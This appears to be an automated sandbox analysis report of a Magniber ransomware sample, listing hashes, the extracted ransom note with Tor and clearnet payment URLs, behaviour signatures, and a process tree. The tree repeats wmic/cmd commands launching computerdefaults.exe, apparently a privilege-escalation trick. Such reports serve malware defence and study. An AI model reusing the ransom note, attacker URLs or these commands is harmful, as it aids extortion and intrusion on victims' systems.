Analysis
-
max time kernel
147s -
max time network
122s -
platform
windows10_x64 -
resource
win10-en-20211104 -
submitted
11-11-2021 09:54
General
-
Target
1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe
-
Size
22KB
-
MD5
7906dc475a8ae55ffb5af7fd3ac8f10a
-
SHA1
e7304e2436dc0eddddba229f1ec7145055030151
-
SHA256
1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367
-
SHA512
c087b3107295095e9aca527d02b74c067e96ca5daf5457e465f8606dbf4809027faedf65d77868f6fb8bb91a1438e3d0169e59efddf1439bbd3adb3e23a739a1
Score
10/10
Malware Config
Extracted
Path
C:\Users\Admin\Desktop\readme.txt
Family
magniber
Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!
====================================================================================================
Your files are NOT damaged! Your files are modified only. This modification is reversible.
The only 1 way to decrypt your files is to receive the private key and decryption program.
Any attempts to restore your files with the third party software will be fatal for your files!
====================================================================================================
To receive the private key and decryption program follow the instructions below:
1. Download "Tor Browser" from https://www.torproject.org/ and install it.
2. In the "Tor Browser" open your personal page here:
http://6c34c818baf46e10e8eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj
Note! This page is available via "Tor Browser" only.
====================================================================================================
Also you can use temporary addresses on your personal page without using "Tor Browser":
http://6c34c818baf46e10e8eltalkfzj.jobsbig.cam/eltalkfzj
http://6c34c818baf46e10e8eltalkfzj.boxgas.icu/eltalkfzj
http://6c34c818baf46e10e8eltalkfzj.sixsees.club/eltalkfzj
http://6c34c818baf46e10e8eltalkfzj.nowuser.casa/eltalkfzj
Note! These are temporary addresses! They will be available for a limited amount of time!
URLs
http://6c34c818baf46e10e8eltalkfzj.n5fnrf4l7bdjhelx.onion/eltalkfzj
http://6c34c818baf46e10e8eltalkfzj.jobsbig.cam/eltalkfzj
http://6c34c818baf46e10e8eltalkfzj.boxgas.icu/eltalkfzj
http://6c34c818baf46e10e8eltalkfzj.sixsees.club/eltalkfzj
http://6c34c818baf46e10e8eltalkfzj.nowuser.casa/eltalkfzj
Signatures
-
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Process spawned unexpected child process 14 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Modifies extensions of user files 4 IoCs
Ransomware generally changes the extension on encrypted files.
-
Suspicious use of SetThreadContext 6 IoCs
-
Program crash 1 IoCs
-
Modifies registry class 29 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵
-
-
-
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵
-
-
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵
-
-
-
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵
-
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"C:\Users\Admin\AppData\Local\Temp\1814a6a6749684cdacd792374e0ba31b7be4ff6f9675f3fd15d543afbb540367.exe"2⤵
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"4⤵
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"4⤵
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""3⤵
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"4⤵
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""3⤵
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"4⤵
- Suspicious use of WriteProcessMemory
-
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵
-
-
-
C:\Windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵
-
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3656 -s 8322⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵
-
-
-
c:\windows\system32\sihost.exesihost.exe1⤵
- Modifies extensions of user files
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\system32\notepad.exenotepad.exe C:\Users\Public\readme.txt2⤵
- Opens file in notepad (likely ransom note)
-
-
\??\c:\windows\system32\cmd.execmd /c "start http://6c34c818baf46e10e8eltalkfzj.jobsbig.cam/eltalkfzj^&1^&41615288^&86^&311^&2215063"2⤵
-
-
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵
-
-
-
\??\c:\windows\system32\cmd.execmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵
-
-
C:\Windows\system32\cmd.execmd /c computerdefaults.exe1⤵
- Process spawned unexpected child process
-
C:\Windows\system32\ComputerDefaults.execomputerdefaults.exe2⤵
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16KB
-
Filesize
4KB
-
Filesize
24KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB